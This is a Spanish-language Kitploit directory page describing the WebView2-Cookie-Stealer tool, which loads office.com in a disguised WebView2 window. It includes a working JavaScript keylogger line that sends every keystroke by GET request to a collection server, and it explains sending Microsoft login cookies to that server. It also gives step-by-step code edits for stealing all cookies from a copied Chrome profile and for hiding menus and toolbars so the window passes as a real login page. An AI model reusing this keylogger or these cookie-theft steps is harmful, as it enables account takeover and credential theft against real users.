Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WebView2-Cookie-Stealer — Inyecta un keylogger en JavaScript en páginas WebView2 para capturar pulsaciones de teclas y exfiltrar cookies de sesiones de autenticación de Microsoft mediante solicitudes HTTP GET. | Kitploit
Herramientas/GitHubGitHub/mrd0x/webview2-cookie-stealer
Ataques de ContraseñasExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónPhishing
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

Inyecta un keylogger en JavaScript en páginas WebView2 para capturar pulsaciones de teclas y exfiltrar cookies de sesiones de autenticación de Microsoft mediante solicitudes HTTP GET.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
26658hace 4 añosRevisado por Kitploit

Entrada de blog

Por favor, lea esta entrada de blog para obtener más información.

Código fuente

Este código es una versión modificada del Código WebView2 de Microsoft. El código actual puede limpiarse y mejorarse mucho.

Demostración

Ejemplo de inicio

Ejemplo de uso

Uso

Probado en Windows 10 y 11.

Cuando se ejecuta el binario, se carga https://office.com/login. Se inyecta un keylogger de JavaScript en cada página y las pulsaciones de teclas se envían a http://127.0.0.1:8080. Además, cuando el usuario se autentica exitosamente, las cookies de login.microsoftonline.com se codifican en base64 y se envían a http://127.0.0.1:8080 mediante una solicitud HTTP GET.

Modificando JavaScript

Si desea modificar el JavaScript, el código que debe cambiarse se muestra a continuación en la línea 1096 de AppWindow.cpp.

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Robando cookies de Chrome

WebView2 permite iniciar con una Carpeta de Datos de Usuario (UDF) existente en lugar de crear una nueva. La UDF contiene todas las contraseñas, sesiones, marcadores, etc. La UDF de Chrome se encuentra en C:\Users\<username>\AppData\Local\Google\Chrome\User Data. Simplemente podemos indicarle a WebView2 que inicie la instancia usando este perfil y, al iniciar, extraer todas las cookies y transferirlas al servidor del atacante.

El único inconveniente es que WebView2 busca una carpeta llamada EBWebView en lugar de User Data (no estoy seguro por qué). Copie la carpeta User Data y renómbrela a EBWebView.

Cambios necesarios

  • En la línea 41 de app.cpp:

    • Cambie std::wstring userDataFolder(L""); por std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • La carpeta especificada debe contener la carpeta EBWebView desde la cual WebView2 leerá.
  • En la línea 40 de ScenarioCookieManagement.cpp:

    • Cambie GetCookiesHelper(L"https://login.microsoftonline.com"); por GetCookiesHelper(L"");

Cuando se invoca GetCookiesHelper sin proporcionar ningún sitio web, extraerá todas las cookies.

Nota: Esto no funcionará con la aplicación actual si hay una gran cantidad de cookies, porque la aplicación las envía mediante una solicitud GET que tiene un límite de longitud.

Funciones importantes

Si desea realizar modificaciones en el binario, encontrará información sobre las funciones importantes a continuación.

  • AppStartPage.cpp - La función GetUri() contiene la URL que se carga al ejecutar el binario.
  • ScenarioCookieManagement.cpp - La función SendCookies() contiene la dirección IP y el puerto donde se envían las cookies.
  • AppWindow.cpp - La función CallCookieFunction() espera hasta que la URL comience con https://www.office.com/?auth= y llama a ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - Cambios cosméticos
    • Elimine la barra de menú estableciendo todos los valores POPUP en "".
    • Cambie IDS_APP_TITLE e IDC_WEBVIEW2APISAMPLE. Este es el nombre de la aplicación en la barra de título.
    • Cambie IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE e IDI_SMALL. Estos apuntan a un archivo que es el icono de esta aplicación.
Descargar herramienta
.ico
  • Toolbar.cpp - itemHeight debe establecerse en 0 para eliminar el menú superior. Esto ya está resuelto en este código.
  • AppWindow.cpp - LoadImage() debe comentarse. Esto oculta la imagen de presentación azul. Esto ya está resuelto en este código.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); cambie el valor del último parámetro a true. Esto oculta la barra de herramientas. Esto ya está resuelto en este código.